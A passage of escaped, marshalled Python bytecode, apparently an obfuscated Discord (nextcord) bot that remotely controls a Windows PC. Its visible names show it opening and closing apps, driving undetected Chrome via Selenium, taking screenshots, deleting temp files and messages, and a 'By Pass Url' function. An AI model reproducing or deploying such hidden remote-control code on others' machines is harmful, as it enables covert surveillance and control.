01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x06Nr\x10\x00\x00\x00Tr\x95\x00\x00\x00r\xca\x00\x00\x00r\xcc\x00\x00\x00)\x07\xda\x08removepors\x00\x00\x00r\x98\x00\x00\x00r\x99\x00\x00\x00ry\x00\x00\x00r\x9a\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bo1_callback\xe2\x01\x00\x00s\x0e\x00\x00\x00\x02\x80\x08\x02\x02\x01\x04\x02\x10\x01\x16\x01\x1c\x01z\x1dout.out1.<locals>.o1_callbackc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xd3\x00\x00\x00sB\x00\x00\x00\x81\x01t\x00d\x017\x00a\x00z\rd\x02a\x01|\x00\xa0\x02d\x03\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x00\xa0\x02d\x04\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x05Nr\x10\x00\x00\x00Fr\xca\x00\x00\x00r\xcc\x00\x00\x00)\x03r:\x01\x00\x00rs\x00\x00\x00r\x1c\x00\x00\x00r\x03\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x0bo2_callback\xeb\x01\x00\x00s\x0c\x00\x00\x00\x02\x80\x08\x02\x02\x01\x04\x02\x16\x01\x1c\x01z\x1dout.out1.<locals>.o2_callbackuN\x00\x00\x00\xe0\xb8\x81\xe0\xb8\xb2\xe0\xb8\xa3\xe0\xb8\x81\xe0\xb8\x94\xe0\xb8\x9b\xe0\xb8\xb4\xe0\xb8\x94 time out \xe0\xb8\x82\xe0\xb8\xad\xe0\xb8\x87 youube \xe0\xb8\xad\xe0\xb8\xb1\xe0\xb8\x95\xe0\xb9\x82\xe0\xb8\x99\xe0\xb8\xa1\xe0\xb8\xb1\xe0\xb8\x95\xe0\xb8\xb4r\x12\x00\x00\x00r\x0b\x01\x00\x00)\nr\x1a\x00\x00\x00r\xc6\x00\x00\x00r\x0e\x01\x00\x00r\xc1\x00\x00\x00r\x0f\x01\x00\x00r\xb4\x00\x00\x00r\r\x01\x00\x00r\xb6\x00\x00\x00r\x1c\x00\x00\x00r\xbf\x00\x00\x00)\x06r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00r;\x01\x00\x00r<\x01\x00\x00r\x19\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04out1\xe0\x01\x00\x00s\x12\x00\x00\x00\x02\x80\x10\x02\x10\t\x06\x08\x06\x01\n\x01\n\x01\n\x01 \x01z\x08out.out1z\x19delete windows temp filesc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00\xc3\x00\x00\x00sH\x00\x00\x00\x81\x01z\x14|\x02\xa0\x00d\x01\xa1\x01I\x00d\x00H\x00\x01\x00|\x02\xa0\x00t\x01\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00W\x00d\x00S\x00\x01\x00\x01\x00\x01\x00|\x02\xa0\x00d\x02\xa1\x01I\x00d\x00H\x00\x01\x00Y\x00d\x00S\x00)\x03Nu\x8d\x00\x00\x00\xe0\xb8\x81\xe0\xb8\xb3\xe0\xb8\xa5\xe0\xb8\xb1\xe0\xb8\x87\xe0\xb8\xa5\xe0\xb8\x9a\xe0\xb9\x84\xe0\xb8\x9f\xe0\xb8\xa5\xe0\xb9\x8c Temp \xe0\xb8\x9b\xe0\xb8\xb8\xe0\xb9\x88\xe0\xb8\xa1\xe0\xb8\x97\xe0\xb8\xb1\xe0\xb9\x89\xe0\xb8\x87\xe0\xb8\xab\xe0\xb8\xa1\xe0\xb8\x94\xe0\xb8\xad\xe0\xb8\xb2\xe0\xb8\x94\xe0\xb9\x83\xe0\xb8\x8a\xe0\xb9\x89\xe0\xb8\x87\xe0\xb8\xb2\xe0\xb8\x99\xe0\xb9\x84\xe0\xb8\xa1\xe0\xb9\x88\xe0\xb9\x84\xe0\xb8\x94\xe0\xb9\x89\xe0\xb8\x8a\xe0\xb8\xb1\xe0\xb9\x89\xe0\xb8\xa7\xe0\xb8\x84\xe0\xb8\xa3\xe0\xb8\xb2\xe0\xb8\xa7r\xcc\x00\x00\x00)\x02r\x1c\x00\x00\x00rK\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04out2\xf9\x01\x00\x00s\x0c\x00\x00\x00\x02\x80\x02\x02\x10\x01\x18\x01\x06\x01\x16\x01z\x08out.out2)\x0er\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r!\x01\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00r=\x01\x00\x00r>\x01\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r9\x01\x00\x00\xde\x01\x00\x00s\x0c\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x18 \x01r9\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00s\xa8\x01\x00\x00e\x00Z\x01d\x00Z\x02\x87\x00f\x01d\x01d\x02\x84\x08Z\x03e\x04j\x05j\x06d\x03e\x04j\x07j\x08d\x03d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x07d\x08\x84\x04\x83\x01Z\x0be\x04j\x05j\x06d\te\x04j\x07j\x08d\td\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\nd\x0b\x84\x04\x83\x01Z\x0ce\x04j\x05j\x06d\x0ce\x04j\x07j\x08d\x0cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\rd\x0e\x84\x04\x83\x01Z\re\x04j\x05j\x06d\x0fe\x04j\x07j\x0ed\x10d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x11d\x12\x84\x04\x83\x01Z\x0fe\x04j\x05j\x06d\x13e\x04j\x07j\x10d\x13d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x14d\x15\x84\x04\x83\x01Z\x11e\x04j\x05j\x06d\x16e\x04j\x07j\x10d\x16d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x17d\x18\x84\x04\x83\x01Z\x12e\x04j\x05j\x06d\x19e\x04j\x07j\x13d\x19d\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x1ad\x1b\x84\x04\x83\x01Z\x14e\x04j\x05j\x06d\x1ce\x04j\x07j\x0ed\x1cd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d\x1dd\x1e\x84\x04\x83\x01Z\x15e\x04j\x05j\x06d\x1fe\x04j\x07j\x0ed\x1fd\x04\x8d\x03d\x05e\x04j\td\x06e\x04j\nf\x04d d!\x84\x04\x83\x01Z\x16\x87\x00\x04\x00Z\x17S\x00)"\xda\x08mainmanuc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00r\xd5\x00\x00\x00r\xd6\x00\x00\x00r\xd8\x00\x00\x00r\xb7\x00\x00\x00r\xb9\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00r\xb3\x00\x00\x00\x01\x02\x00\x00r\xf2\x00\x00\x00z\x11mainmanu.__init__z\x08open appr\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00\xf3&\x00\x00\x00\x81\x01|\x02j\x00t\x01j\x02d\x01d\x02d\x03\x8d\x02t\x03\x83\x00d\x04\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x05Nz\x08App Open\xe9\x00\xff\x04\x00\xa9\x02r\x13\x00\x00\x00r4\x00\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r\xfd\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02m1\x02\x02\x00\x00\xf3\x04\x00\x00\x00\x02\x80$\x01z\x0bmainmanu.m1\xfa\tMy Systemc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x05NrE\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r\xf1\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02m2\x04\x02\x00\x00rD\x01\x00\x00z\x0bmainmanu.m2\xfa\tclose appc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x05NrG\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r\xd4\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x02m3\x06\x02\x00\x00rD\x01\x00\x00z\x0bmainmanu.m3z\x0bBy Pass Url\xda\x06bypassc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\xc3\x00\x00\x00s\x1a\x00\x00\x00\x81\x01|\x02j\x00\xa0\x01t\x02\x83\x00\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00r$\x00\x00\x00)\x03rJ\x00\x00\x00r\xed\x00\x00\x00r\xad\x00\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00rI\x01\x00\x00\x08\x02\x00\x00s\x04\x00\x00\x00\x02\x80\x18\x01z\x0fmainmanu.bypassr9\x01\x00\x00c\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x05Nr9\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r9\x01\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04outf\n\x02\x00\x00rD\x01\x00\x00z\rmainmanu.outf\xda\x08seleniumc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x05NZ\x08SeleniumrA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r5\x01\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x03sim\x0c\x02\x00\x00rD\x01\x00\x00z\x0cmainmanu.simZ\nscreenshotc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\xc3\x00\x00\x00s2\x00\x00\x00\x81\x01t\x00\xa0\x01\xa1\x00}\x03|\x03\xa0\x02d\x01\xa1\x01\x01\x00|\x02j\x03t\x04j\x05d\x01d\x02\x8d\x01d\x03\x8d\x01I\x00d\x00H\x00\x01\x00d\x00S\x00)\x04Nz\x14./lib/screenshot.png)\x01\xda\x02fp)\x01r\x81\x00\x00\x00)\x06r\x0b\x00\x00\x00Z\x04grab\xda\x04saver\x1c\x00\x00\x00r\x1a\x00\x00\x00Z\x04File)\x04r\xb8\x00\x00\x00r\xdc\x00\x00\x00r\xbc\x00\x00\x00Z\x08myscreenr"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x04sim2\x0e\x02\x00\x00s\x08\x00\x00\x00\x02\x80\x08\x02\n\x01\x1e\x01z\rmainmanu.sim2\xda\x08Settingsc\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x05\x00\x00\x00\xc3\x00\x00\x00r@\x01\x00\x00)\x05NrP\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\x04r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r#\x01\x00\x00r\xdf\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00rP\x01\x00\x00\x13\x02\x00\x00rD\x01\x00\x00z\x11mainmanu.Settingsz\x12delete all messagec\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00sZ\x00\x00\x00\x81\x01t\x00\xa0\x01t\x02\xa1\x01}\x03|\x03j\x03d\x00d\x01\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x04|\x04\xa0\x04\xa1\x00I\x00d\x00H\x00\x01\x00q\x0c6\x00|\x03j\x05t\x06j\x07d\x02d\x03d\x04\x8d\x02t\x08\x83\x00d\x05\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)\x06Nr*\x01\x00\x00\xfa\tMain ManurA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00)\tr\'\x01\x00\x00r,\x01\x00\x00r-\x01\x00\x00r.\x01\x00\x00r/\x01\x00\x00r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r?\x01\x00\x00r1\x01\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x06delmeg\x15\x02\x00\x00s\x08\x00\x00\x00\x02\x80\n\x02*\x01$\x01z\x0fmainmanu.delmeg)\x18r\xc3\x00\x00\x00r\xc4\x00\x00\x00r\xc5\x00\x00\x00r\xb3\x00\x00\x00r\x1a\x00\x00\x00r\xb4\x00\x00\x00r\xdc\x00\x00\x00r,\x00\x00\x00r!\x01\x00\x00r\xef\x00\x00\x00r\xc6\x00\x00\x00rC\x01\x00\x00rF\x01\x00\x00rH\x01\x00\x00r.\x00\x00\x00rI\x01\x00\x00r-\x00\x00\x00rJ\x01\x00\x00rL\x01\x00\x00r\xf0\x00\x00\x00rO\x01\x00\x00rP\x01\x00\x00rR\x01\x00\x00r\xc7\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\xb9\x00\x00\x00r\x0f\x00\x00\x00r?\x01\x00\x00\x00\x02\x00\x00s(\x00\x00\x00\x08\x00\x0c\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x01\x18\x01\x14\x04\x18\x01\x14\x01 \x01r?\x01\x00\x00c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x07\x00\x00\x00\xc3\x00\x00\x00s\x08\x01\x00\x00\x81\x01t\x00\xa0\x01t\x02\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x03\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x04\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x05\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x06\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x07\x83\x00\xa1\x01\x01\x00t\x00\xa0\x01t\x08\x83\x00\xa1\x01\x01\x00t\x00\xa0\tt\n\xa1\x01}\x00|\x00j\x0bd\x00d\x01\x8d\x012\x00z\r3\x00d\x00H\x00W\x00}\x01|\x01\xa0\x0c\xa1\x00I\x00d\x00H\x00\x01\x00q66\x00|\x00j\rt\x0ej\x0fd\x02d\x03d\x04\x8d\x02t\x05\x83\x00d\x05\x8d\x02I\x00d\x00H\x00\x01\x00t\x10\xa0\x11\xa1\x00}\x02|\x02\xa0\x12d\x06\xa1\x01}\x03t\x13\xa0\x14\xa1\x00}\x04|\x04\xa0\x12d\x07\xa1\x01}\x05t\x15t\x0ej\x0fd\x08|\x05\x17\x00d\t\x17\x00|\x03\x17\x00d\x03d\x04\x8d\x02d\n\x8d\x01I\x00d\x00H\x00\x01\x00t\x16d\x0bt\x00j\x17\x9b\x00\x9d\x02\x83\x01\x01\x00d\x00S\x00)\x0cNr*\x01\x00\x00rQ\x01\x00\x00rA\x01\x00\x00rB\x01\x00\x00r\x0b\x01\x00\x00z\x0b%I:%M:%S %pz\t%B %d, %Yz\topen com z\x03 | r\x17\x00\x00\x00r&\x01\x00\x00)\x18r\'\x01\x00\x00Z\x08add_viewr\xfd\x00\x00\x00r\xd4\x00\x00\x00r\xf1\x00\x00\x00r?\x01\x00\x00r5\x01\x00\x00r#\x01\x00\x00r9\x01\x00\x00r,\x01\x00\x00r-\x01\x00\x00r.\x01\x00\x00r/\x01\x00\x00r\x1c\x00\x00\x00r\x1a\x00\x00\x00r\xbf\x00\x00\x00r\t\x00\x00\x00\xda\x03now\xda\x08strftimer\x08\x00\x00\x00\xda\x05todayr#\x00\x00\x00r\x1e\x00\x00\x00r(\x01\x00\x00)\x06r2\x01\x00\x00r3\x01\x00\x00rH\x00\x00\x00rl\x00\x00\x00rU\x01\x00\x00\xda\x02d2r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x08on_ready\x1a\x02\x00\x00s&\x00\x00\x00\x02\x80\x0c\x02\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x18\x01\x10\x01\x02\xff \x02\x08\x01\n\x01\x08\x01\n\x01&\x01\x14\x01rW\x01\x00\x00z\x16Config Error Bot Token\xda\x05error\xe9\n\x00\x00\x00)cZ\x07asyncior`\x00\x00\x00r\xfe\x00\x00\x00\xda\x03sysrb\x00\x00\x00r\x1a\x00\x00\x00Z\x0cnextcord.extr\x02\x00\x00\x00Z\x17undetected_chromedriverr\x83\x00\x00\x00r\x19\x00\x00\x00r\xa0\x00\x00\x00r\x03\x00\x00\x00rC\x00\x00\x00rE\x00\x00\x00r8\x00\x00\x00r\x04\x00\x00\x00Z\x07os.pathr\x06\x00\x00\x00r\x07\x00\x00\x00r\t\x00\x00\x00r\x08\x00\x00\x00r\x98\x00\x00\x00r?\x00\x00\x00Z\tpyautoguiru\x00\x00\x00rl\x00\x00\x00r\x86\x00\x00\x00r\x87\x00\x00\x00rK\x01\x00\x00r\n\x00\x00\x00Z\x03PILr\x0b\x00\x00\x00r|\x00\x00\x00rc\x00\x00\x00Z\x07config1r\x1b\x00\x00\x00\xda\x05tokenrd\x00\x00\x00r\x1e\x00\x00\x00r\x1f\x00\x00\x00r \x00\x00\x00r-\x01\x00\x00Z\x10backlstchannelidrT\x00\x00\x00rS\x00\x00\x00rV\x00\x00\x00r0\x01\x00\x00\xda\x04argvZ\x04locar:\x01\x00\x00r\x13\x01\x00\x00r\x1f\x01\x00\x00Z\x03Botr\'\x01\x00\x00r\xbf\x00\x00\x00r\x10\x01\x00\x00r\xb4\x00\x00\x00r\xef\x00\x00\x00r,\x00\x00\x00r-\x00\x00\x00r\x14\x01\x00\x00r\x15\x01\x00\x00r\x16\x01\x00\x00r\x17\x01\x00\x00r\x0e\x01\x00\x00r.\x00\x00\x00r\x0f\x01\x00\x00r#\x00\x00\x00r0\x00\x00\x00rK\x00\x00\x00rZ\x00\x00\x00re\x00\x00\x00ro\x00\x00\x00ry\x00\x00\x00rt\x00\x00\x00r\x82\x00\x00\x00r\x8c\x00\x00\x00r\x91\x00\x00\x00r\x9c\x00\x00\x00r\xa8\x00\x00\x00r\xab\x00\x00\x00Z\x05Modalr\xad\x00\x00\x00r\xc9\x00\x00\x00r\xce\x00\x00\x00r\xd2\x00\x00\x00r\r\x01\x00\x00r\xd4\x00\x00\x00r\xf1\x00\x00\x00r\xfd\x00\x00\x00r#\x01\x00\x00r5\x01\x00\x00r9\x01\x00\x00r?\x01\x00\x00\xda\x05eventrW\x01\x00\x00\xda\x03runrm\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r"\x00\x00\x00r\x0f\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\xee\x00\x00\x00\x08\x00\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x08\x01\x0c\x01\x10\x01\x08\x01\x0c\x01\x0c\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x0c\x01\x02\x02\x14\x01\x08\x01\x08\x01\x02\x01\x0c\x01\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x08\x01\x08\x01\x0c\x01\x08\x01\x06\x01\x06\x01\x04\x80\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x08\x01\x0e\x01\x04\x01\x04\x80\x0c\x01\x04\x80\x06\x01\x08\x01\x06\x01\x08\x01\x02\x01\x04\x02\x04\x01\n\x01\x04\x01\n\x01\x0c\x01\x0c\x01\x14\x01\x14\x01\x14\x01\x14\x01\x14\x01\x18\x01\x06\x01\x08\x01\x06\x01\x08\x01\x08\x01\x08\n\x08\x07\x080\x08\x08\x08\t\x08\x0b\x08\x0b\x08\n\x08\x0b\x08\x10\x08\x0c\x08\x0c\x08\x08\x14\x04\x14\x12\x14\x12\x14\r\x14\x0b\x142\x14 \x141\x14\x0c\x14\x14\x14"\x04\x1a\n\x01\x06\x12\x02\x01\x06\x01\x02\x01\x0e\x01\x06\x01\x08\x01\x06\x01\x08\x01\x0c\x01\x08\x01\x04\x80\x1a\x01\x0e\xf5'))
